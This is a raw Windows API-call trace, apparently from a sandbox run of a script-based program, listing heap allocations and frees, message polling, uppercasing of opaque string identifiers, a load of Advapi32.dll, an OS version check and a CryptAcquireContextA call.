[0106.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0106.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0106.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0106.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0106.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0106.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0106.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0106.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0106.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0106.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0106.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0106.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0106.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0106.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.903] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.903] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0106.903] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0106.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.904] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0106.904] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.904] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.904] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0106.904] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.904] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0106.904] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0106.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.905] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0106.905] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.905] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.905] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.905] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0106.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0106.906] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0106.906] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0106.906] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0106.906] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0106.906] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0106.906] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.906] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.906] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.906] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0106.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0106.907] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.907] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.907] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0106.907] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.907] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0106.907] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0106.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0106.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0106.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0106.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ee0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0106.907] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bef78) returned 1 [0106.908] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.908] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.908] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0106.908] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.908] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0106.908] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.909] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.909] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.909] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.909] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.909] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.909] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0106.909] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.909] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0106.909] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.909] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.909] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.909] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.909] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0106.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.983] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0106.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.983] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0106.983] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.983] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0106.983] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.983] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.983] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0106.983] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.983] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0106.983] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.983] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.983] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.983] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.983] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0106.983] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.984] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0106.984] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.984] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.984] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.984] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.984] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.984] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.984] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb 